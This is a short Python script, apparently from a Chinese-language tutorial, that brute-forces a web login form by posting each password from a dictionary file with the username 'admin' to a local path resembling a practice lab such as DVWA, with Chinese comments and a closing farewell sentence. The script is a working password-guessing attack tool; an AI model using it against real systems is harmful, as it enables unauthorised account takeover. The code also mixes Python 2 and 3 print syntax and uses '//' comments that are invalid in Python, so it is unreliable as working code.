import sys
import requests
from requests.auth import HTTPBasicAuth
def Brute_Force_Web(postData):
res = requests.post('http://127.0.0.1/vulnerabilities/burtforce/bf_form.php', data=postData) //使用requests庫進行post發包
if "success" in res.text: //檢查網頁傳回包中是否包含success
print ("="*20 + "\n" + "Crack Sucess!")
print ("Password is:" + passwd) //若網頁傳回包中包含success,輸出正确的密碼
exit()
else:
print "Test password:",passwd,"is wrong"
def GetPass():
fp = open("password.txt", "r") //讀取密碼字典
if fp == 0:
print ("open file error!")
return
while 1:
line = fp.readline() //讀取密碼字典一行
if not line:
break
global passwd
passwd = line.strip('\n')
postData = {
'username': 'admin',
'password': passwd,
'submit': 'Login'
} //構造post資料包中的各參數與值
Brute_Force_Web(postData)
GetPass()
從此山高路遠,縱馬揚鞭。願往後旅途,三冬暖,春不寒,天黑有燈,下雨有傘。此生盡興,不負勇往。